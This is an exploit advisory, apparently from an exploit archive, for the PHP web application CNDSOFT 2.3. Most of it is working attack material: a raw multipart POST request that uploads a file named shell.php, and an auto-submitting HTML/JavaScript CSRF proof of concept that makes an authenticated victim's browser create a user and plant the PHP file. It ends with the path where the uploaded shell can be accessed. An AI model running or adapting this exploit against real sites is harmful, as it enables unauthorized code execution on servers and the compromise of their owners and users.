CNDSOFT 2.3 Cross Site Request Forgery / Shell Upload
Posted on 20 October 2016
*========================================================================================================= # Exploit Title: CNDSOFT 2.3 - Arbitrary File Upload with CSRF (shell.php) # Author: Besim # Google Dork: - # Date: 19/10/2016 # Type: webapps # Platform : PHP # Vendor Homepage: - # Software Link: http://www.phpexplorer.com/Goster/1227 # Version: 2.3 *========================================================================================================= Vulnerable URL and Parameter ======================================== Vulnerable URL = http://www.site_name/path/ofis/index.php?is=kullanici_tanimla Vulnerable Parameter = &mesaj_baslik TECHNICAL DETAILS & POC & POST DATA ======================================== POST /ofis/index.php?is=kullanici_tanimla HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://site_name/ofis/index.php?is=kullanici_tanimla aa Content-Type: multipart/form-data; boundary=---------------------------5035863528338 Content-Length: 1037 -----------------------------5035863528338 Content-Disposition: form-data; name="utf8" a -----------------------------5035863528338 Content-Disposition: form-data; name="authenticity_token" CFC7d00LWKQsSahRqsfD+e/mHLqbaVIXBvlBGe/KP+I= -----------------------------5035863528338 Content-Disposition: form-data; name="kullanici_adi" meryem -----------------------------5035863528338 Content-Disposition: form-data; name="kullanici_sifresi" meryem -----------------------------5035863528338 Content-Disposition: form-data; name="kullanici_mail_adresi" m@yop.com -----------------------------5035863528338 Content-Disposition: form-data; name="MAX_FILE_SIZE" 30000 -----------------------------5035863528338 Content-Disposition: form-data; name="*kullanici_resmi*"; *filename*="shell.php" Content-Type: application/octet-stream *<?php phpinfo(); ?>* -----------------------------5035863528338 Content-Disposition: form-data; name="personel_maasi" 5200 -----------------------------5035863528338-- *CSRF PoC - File Upload (Shell.php)* ======================================== <html> <!-- CSRF PoC --> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", " http://site_name/ofis/index.php?is=kullanici_tanimla", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------5035863528338"); xhr.withCredentials = true; var body = "-----------------------------5035863528338 " + "Content-Disposition: form-data; name="utf8" " + " " + "xe2x9cx93 " + "-----------------------------5035863528338 " + "Content-Disposition: form-data; name="authenticity_token" " + " " + "CFC7d00LWKQsSahRqsfD+e/mHLqbaVIXBvlBGe/KP+I= " + "-----------------------------5035863528338 " + "Content-Disposition: form-data; name="kullanici_adi" " + " " + "meryem " + "-----------------------------5035863528338 " + "Content-Disposition: form-data; name="kullanici_sifresi" " + " " + "meryem " + "-----------------------------5035863528338 " + "Content-Disposition: form-data; name="kullanici_mail_adresi" " + " " + "m@yop.com " + "-----------------------------5035863528338 " + "Content-Disposition: form-data; name="MAX_FILE_SIZE" " + " " + "30000 " + "-----------------------------5035863528338 " + "Content-Disposition: form-data; name="kullanici_resmi"; filename="shell.php" " + "Content-Type: application/octet-stream " + " " + "x3c?php " + " phpinfo(); " + " " + " ?x3e " + "-----------------------------5035863528338 " + "Content-Disposition: form-data; name="personel_maasi" " + " " + "5200 " + "-----------------------------5035863528338-- "; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } submitRequest(); </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html> ======================================== *Access File : *http://www.site_name/path/personel_resimleri/shell.php RISK ======================================== Attacker can arbitrary file upload. -- Besim ALTINOK
